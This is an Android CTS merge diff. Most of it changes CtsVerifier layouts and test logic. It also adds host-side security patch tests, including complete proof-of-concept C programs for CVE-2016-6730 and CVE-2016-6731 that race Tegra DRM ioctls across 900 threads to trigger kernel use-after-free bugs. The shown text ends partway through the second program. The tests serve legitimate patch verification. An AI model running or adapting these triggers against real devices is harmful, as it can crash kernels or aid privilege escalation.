Merge "Merge "Merge "Merge "Use fix iteration numbers in tuning stress test" into marshmallow-cts-dev am: acb676213a" into nougat-cts-dev am: 57a2ed7106" into nougat-mr1-cts-dev am: f3967b1ebb"
am: 2b214fe27c
Change-Id: I0aba8c0aed2aeeceb14d520738ae76aca7599767
diff --git a/.gitignore b/.gitignore
index 07a80d6..dbd5bcf 100644
--- a/.gitignore
+++ b/.gitignore
@@ -7,3 +7,5 @@
/bin
.idea/*
.idea/
+gen/
+*.iml
diff --git a/apps/CtsVerifier/Android.mk b/apps/CtsVerifier/Android.mk
index b1c0ebf..5c36794 100644
--- a/apps/CtsVerifier/Android.mk
+++ b/apps/CtsVerifier/Android.mk
@@ -26,7 +26,6 @@
LOCAL_SRC_FILES := $(call all-java-files-under, src) $(call all-Iaidl-files-under, src)
LOCAL_STATIC_JAVA_LIBRARIES := android-ex-camera2 \
- android-support-v4 \
compatibility-common-util-devicesidelib \
cts-sensors-tests \
cts-location-tests \
diff --git a/apps/CtsVerifier/AndroidManifest.xml b/apps/CtsVerifier/AndroidManifest.xml
index cc62cef..27bbe61 100644
--- a/apps/CtsVerifier/AndroidManifest.xml
+++ b/apps/CtsVerifier/AndroidManifest.xml
@@ -18,7 +18,7 @@
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.android.cts.verifier"
android:versionCode="5"
- android:versionName="7.1_r2">
+ android:versionName="7.1_r201703s">
<uses-sdk android:minSdkVersion="19" android:targetSdkVersion="25"/>
diff --git a/apps/CtsVerifier/res/layout-round/provisioning_byod.xml b/apps/CtsVerifier/res/layout-round/provisioning_byod.xml
new file mode 100644
index 0000000..d2b6e0e
--- /dev/null
+++ b/apps/CtsVerifier/res/layout-round/provisioning_byod.xml
@@ -0,0 +1,42 @@
+<?xml version="1.0" encoding="utf-8"?><!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<android.support.v4.widget.NestedScrollView xmlns:android="http://schemas.android.com/apk/res/android"
+ android:id="@+id/main_layout"
+ style="@style/RootLayoutPadding"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ android:orientation="vertical">
+
+ <LinearLayout
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ android:orientation="vertical">
+ <TextView
+ android:id="@+id/test_instructions"
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:padding="10dip"/>
+ <Button
+ android:id="@+id/prepare_test_button"
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"/>
+ <ListView
+ android:id="@+id/android:list"
+ android:layout_width="match_parent"
+ android:layout_height="0dip"
+ android:layout_weight="3"/>
+ <include layout="@layout/pass_fail_buttons"/>
+ </LinearLayout>
+</android.support.v4.widget.NestedScrollView>
diff --git a/apps/CtsVerifier/res/layout/provisioning_byod.xml b/apps/CtsVerifier/res/layout/provisioning_byod.xml
index fb4093a..227d8d8 100644
--- a/apps/CtsVerifier/res/layout/provisioning_byod.xml
+++ b/apps/CtsVerifier/res/layout/provisioning_byod.xml
@@ -1,42 +1,37 @@
<?xml version="1.0" encoding="utf-8"?><!-- Copyright (C) 2011 The Android Open Source Project
-
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
-
http://www.apache.org/licenses/LICENSE-2.0
-
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
-<ScrollView xmlns:android="http://schemas.android.com/apk/res/android"
- style="@style/RootLayoutPadding"
+<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
android:layout_width="match_parent"
- android:layout_height="match_parent">
-
- <LinearLayout
+ android:layout_height="match_parent"
+ android:orientation="vertical">
+ <ScrollView
android:layout_width="match_parent"
- android:layout_height="match_parent"
- android:orientation="vertical">
+ android:layout_height="wrap_content"
+ android:layout_weight="2">
<TextView
android:id="@+id/test_instructions"
android:layout_width="match_parent"
android:layout_height="wrap_content"
android:padding="10dip"
- android:textSize="18dip" />
- <Button
- android:id="@+id/prepare_test_button"
- android:layout_width="match_parent"
- android:layout_height="wrap_content" />
-
- <ListView
- android:id="@+id/android:list"
- android:layout_width="match_parent"
- android:layout_height="wrap_content" />
-
- <include layout="@layout/pass_fail_buttons" />
- </LinearLayout>
-</ScrollView>
+ android:textSize="18dip"/>
+ </ScrollView>
+ <Button
+ android:id="@+id/prepare_test_button"
+ android:layout_width="204dip"
+ android:layout_height="wrap_content"/>
+ <ListView
+ android:id="@+id/android:list"
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:layout_weight="3"/>
+ <include layout="@layout/pass_fail_buttons"/>
+</LinearLayout>
diff --git a/apps/CtsVerifier/res/layout/pwa_widgets.xml b/apps/CtsVerifier/res/layout/pwa_widgets.xml
index e5ebddb..cb611b9 100644
--- a/apps/CtsVerifier/res/layout/pwa_widgets.xml
+++ b/apps/CtsVerifier/res/layout/pwa_widgets.xml
@@ -12,19 +12,16 @@
See the License for the specific language governing permissions and
limitations under the License.
-->
-<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
+<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"
android:layout_width="match_parent"
android:layout_height="match_parent">
- <TextureView
- android:id="@+id/texture_view"
- android:layout_width="match_parent"
- android:layout_height="match_parent" />
-
<LinearLayout
+ android:id="@+id/test_controls"
android:layout_width="fill_parent"
android:layout_height="wrap_content"
- android:orientation="vertical">
+ android:orientation="vertical"
+ android:layout_gravity="top">
<LinearLayout
android:layout_width="match_parent"
@@ -55,4 +52,10 @@
</LinearLayout>
</LinearLayout>
-</LinearLayout>
+ <TextureView
+ android:id="@+id/texture_view"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ android:layout_below="@id/test_controls" />
+
+</RelativeLayout>
diff --git a/apps/CtsVerifier/res/values-watch/strings.xml b/apps/CtsVerifier/res/values-watch/strings.xml
index 1f25b04..6f1470c 100644
--- a/apps/CtsVerifier/res/values-watch/strings.xml
+++ b/apps/CtsVerifier/res/values-watch/strings.xml
@@ -19,4 +19,9 @@
<item>com.android.cts.verifier.notifications.NotificationAttentionManagementVerifierActivity</item>
<item>com.android.cts.verifier.notifications.NotificationListenerVerifierActivity</item>
</string-array>
-</resources>
\ No newline at end of file
+
+ <string name="snsr_device_suspend_test_instr">Once you begin the test, disconnect USB, then
+ perform a palm press to turn off display and put device into suspend mode. The screen will
+ turn on and device will vibrate once all the tests are completed.
+ </string>
+</resources>
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/DialogTestListActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/DialogTestListActivity.java
index 167fd84..6933ef4 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/DialogTestListActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/DialogTestListActivity.java
@@ -21,10 +21,12 @@
import android.content.Context;
import android.content.DialogInterface;
import android.content.Intent;
+import android.content.pm.PackageManager;
import android.database.DataSetObserver;
import android.os.Bundle;
import android.util.Log;
import android.view.LayoutInflater;
+import android.view.MotionEvent;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.Button;
@@ -49,6 +51,7 @@
private final int mInstructionsStringId;
protected Button mPrepareTestButton;
+ protected ListView mTestFeaturesList;
protected int mCurrentTestPosition;
@@ -85,15 +88,31 @@
mCurrentTestPosition = 0;
- TextView instructionTextView = (TextView)findViewById(R.id.test_instructions);
+ TextView instructionTextView = (TextView) findViewById(R.id.test_instructions);
instructionTextView.setText(mInstructionsStringId);
- mPrepareTestButton = (Button)findViewById(R.id.prepare_test_button);
+ mPrepareTestButton = (Button) findViewById(R.id.prepare_test_button);
+ mTestFeaturesList = (ListView) findViewById(android.R.id.list);
+ if (getPackageManager().hasSystemFeature(PackageManager.FEATURE_WATCH)) {
+ mTestFeaturesList.setOnTouchListener((View v, MotionEvent e) -> {
+ switch (e.getAction()) {
+ case MotionEvent.ACTION_DOWN:
+ v.getParent().requestDisallowInterceptTouchEvent(true);
+ break;
+ case MotionEvent.ACTION_UP:
+ v.getParent().requestDisallowInterceptTouchEvent(false);
+ break;
+ default:
+ }
+ return false;
+ });
+ }
}
/**
* Subclasses must add their tests items to the provided adapter(usually instances of
* {@link DialogTestListItem} or {@link DialogTestListItemWithIcon} but any class deriving from
* {@link TestListAdapter.TestListItem} will do).
+ *
* @param adapter The adapter to add test items to.
*/
protected abstract void setupTests(ArrayTestListAdapter adapter);
@@ -165,7 +184,7 @@
.getItem(position);
if (test instanceof DialogTestListItem) {
mCurrentTestPosition = position;
- ((DialogTestListItem)test).performTest(this);
+ ((DialogTestListItem) test).performTest(this);
} else {
try {
super.handleItemClick(l, v, position, id);
@@ -180,6 +199,7 @@
/**
* Start a test's manual intent
+ *
* @param test The test the manual intent of which is to be started.
* @return true if activity could be started successfully, false otherwise.
*/
@@ -218,6 +238,7 @@
public interface TestCallback {
void onPass();
+
void onFail();
}
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/KeyguardDisabledFeaturesActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/KeyguardDisabledFeaturesActivity.java
index 52151aa..31a8791 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/KeyguardDisabledFeaturesActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/KeyguardDisabledFeaturesActivity.java
@@ -21,6 +21,8 @@
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.content.pm.ResolveInfo;
import android.hardware.fingerprint.FingerprintManager;
import android.os.Bundle;
import android.provider.Settings;
@@ -32,6 +34,8 @@
import com.android.cts.verifier.DialogTestListActivity;
import com.android.cts.verifier.R;
+import java.util.List;
+
public class KeyguardDisabledFeaturesActivity extends DialogTestListActivity {
protected DevicePolicyManager mDpm;
@@ -131,11 +135,20 @@
@Override
protected void setupTests(ArrayTestListAdapter adapter) {
- setupDisableTrustAgentsTest(adapter);
+ if (hasTrustAgents()) {
+ setupDisableTrustAgentsTest(adapter);
+ }
setupDisableUnredactedWorkNotification(adapter);
setupFingerprintTests(adapter);
}
+ private boolean hasTrustAgents() {
+ PackageManager packageManager = getPackageManager();
+ Intent intent = new Intent("android.service.trust.TrustAgentService");
+ List<ResolveInfo> resolveInfos = packageManager.queryIntentServices(intent, 0);
+ return resolveInfos.size() > 0;
+ }
+
@Override
protected void clearRemainingState(final DialogTestListItem test) {
super.clearRemainingState(test);
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/sensors/BatchingTestActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/sensors/BatchingTestActivity.java
index 7ef63d7..b7d9617 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/sensors/BatchingTestActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/sensors/BatchingTestActivity.java
@@ -19,6 +19,7 @@
import com.android.cts.verifier.R;
import com.android.cts.verifier.sensors.base.SensorCtsVerifierTestActivity;
+import android.content.pm.PackageManager;
import android.hardware.Sensor;
import android.hardware.SensorManager;
import android.hardware.cts.helpers.TestSensorEnvironment;
@@ -82,6 +83,9 @@
@SuppressWarnings("unused")
public String testProximity_batching() throws Throwable {
+ if (getPackageManager().hasSystemFeature(PackageManager.FEATURE_SENSOR_PROXIMITY)) {
+ return null;
+ }
return runBatchTest(
Sensor.TYPE_PROXIMITY,
REPORT_LATENCY_10_SEC,
@@ -90,6 +94,9 @@
@SuppressWarnings("unused")
public String testProximity_flush() throws Throwable {
+ if (getPackageManager().hasSystemFeature(PackageManager.FEATURE_SENSOR_PROXIMITY)) {
+ return null;
+ }
return runFlushTest(
Sensor.TYPE_PROXIMITY,
REPORT_LATENCY_10_SEC,
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 0056e81..cd68c69 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -14,6 +14,38 @@
limitations under the License.
-->
<configuration description="Config for the CTS Security host tests">
+ <target_preparer class="com.android.compatibility.common.tradefed.targetprep.FilePusher">
+ <option name="cleanup" value="true" />
+ <option name="push" value="CVE-2016-8412->/data/local/tmp/CVE-2016-8412" />
+ <option name="push" value="CVE-2016-8444->/data/local/tmp/CVE-2016-8444" />
+ <option name="push" value="CVE-2016-8448->/data/local/tmp/CVE-2016-8448" />
+ <option name="push" value="CVE-2016-8449->/data/local/tmp/CVE-2016-8449" />
+ <option name="push" value="CVE-2016-8460->/data/local/tmp/CVE-2016-8460" />
+ <option name="push" value="CVE-2017-0403->/data/local/tmp/CVE-2017-0403" />
+ <option name="push" value="CVE-2017-0404->/data/local/tmp/CVE-2017-0404" />
+ <option name="push" value="CVE-2016-8482->/data/local/tmp/CVE-2016-8482" />
+ <option name="push" value="CVE-2017-0429->/data/local/tmp/CVE-2017-0429" />
+ <option name="push" value="CVE-2016-6730->/data/local/tmp/CVE-2016-6730" />
+ <option name="push" value="CVE-2016-6731->/data/local/tmp/CVE-2016-6731" />
+ <option name="push" value="CVE-2016-6732->/data/local/tmp/CVE-2016-6732" />
+ <option name="push" value="CVE-2016-6733->/data/local/tmp/CVE-2016-6733" />
+ <option name="push" value="CVE-2016-6734->/data/local/tmp/CVE-2016-6734" />
+ <option name="push" value="CVE-2016-6735->/data/local/tmp/CVE-2016-6735" />
+ <option name="push" value="CVE-2016-6736->/data/local/tmp/CVE-2016-6736" />
+ <option name="push" value="CVE-2016-8424->/data/local/tmp/CVE-2016-8424" />
+ <option name="push" value="CVE-2016-8425->/data/local/tmp/CVE-2016-8425" />
+ <option name="push" value="CVE-2016-8426->/data/local/tmp/CVE-2016-8426" />
+ <option name="push" value="CVE-2016-8427->/data/local/tmp/CVE-2016-8427" />
+ <option name="push" value="CVE-2016-8428->/data/local/tmp/CVE-2016-8428" />
+ <option name="push" value="CVE-2016-8429->/data/local/tmp/CVE-2016-8429" />
+ <option name="push" value="CVE-2016-8430->/data/local/tmp/CVE-2016-8430" />
+ <option name="push" value="CVE-2016-8431->/data/local/tmp/CVE-2016-8431" />
+ <option name="push" value="CVE-2016-8432->/data/local/tmp/CVE-2016-8432" />
+ <option name="push" value="CVE-2016-8434->/data/local/tmp/CVE-2016-8434" />
+ <option name="push" value="CVE-2016-8435->/data/local/tmp/CVE-2016-8435" />
+ <option name="push" value="CVE-2016-9120->/data/local/tmp/CVE-2016-9120" />
+ <option name="append-bitness" value="true" />
+ </target_preparer>
<test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
<option name="jar" value="CtsSecurityHostTestCases.jar" />
<option name="runtime-hint" value="32s" />
diff --git a/hostsidetests/security/securityPatch/Android.mk b/hostsidetests/security/securityPatch/Android.mk
new file mode 100644
index 0000000..41a41d0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Android.mk
@@ -0,0 +1,17 @@
+#
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+include $(call all-subdir-makefiles)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk
new file mode 100644
index 0000000..14337ab
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6730
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c
new file mode 100644
index 0000000..bfcdb41
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c
@@ -0,0 +1,164 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define CLK_THREAD_NUM 900
+#define TRY_TIMES CLK_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_GET_CLK_CONSTRAINT 0x12
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_constraint {
+ __u64 context;
+ __u32 index;
+ __u32 type;
+ __u32 rate;
+ __u32 pad;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_GET_CLK_CONSTRAINT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GET_CLK_CONSTRAINT, struct drm_tegra_constraint)
+int fd;
+pthread_t clk_thread_id[CLK_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_constraint clk_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* clk_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_GET_CLK_CONSTRAINT, &clk_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ ret = pthread_create(clk_thread_id + i, NULL, clk_thread, NULL);
+ if(ret){
+ goto out_clk_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set clk */
+ clk_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_clk_thread:
+ /* kill clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ pthread_kill(clk_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk
new file mode 100644
index 0000000..718dbe3
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6731
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c
new file mode 100644
index 0000000..d6cedfb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c
@@ -0,0 +1,165 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define CLK_THREAD_NUM 900
+#define TRY_TIMES CLK_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SET_CLK_CONSTRAINT 0x13
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_constraint {
+ __u64 context;
+ __u32 index;
+ __u32 type;
+ __u32 rate;
+ __u32 pad;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SET_CLK_CONSTRAINT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SET_CLK_CONSTRAINT, struct drm_tegra_constraint)
+int fd;
+pthread_t clk_thread_id[CLK_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_constraint clk_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* clk_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_SET_CLK_CONSTRAINT, &clk_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ ret = pthread_create(clk_thread_id + i, NULL, clk_thread, NULL);
+ if(ret){
+ goto out_clk_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set clk */
+ clk_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+ puts("ran 1");
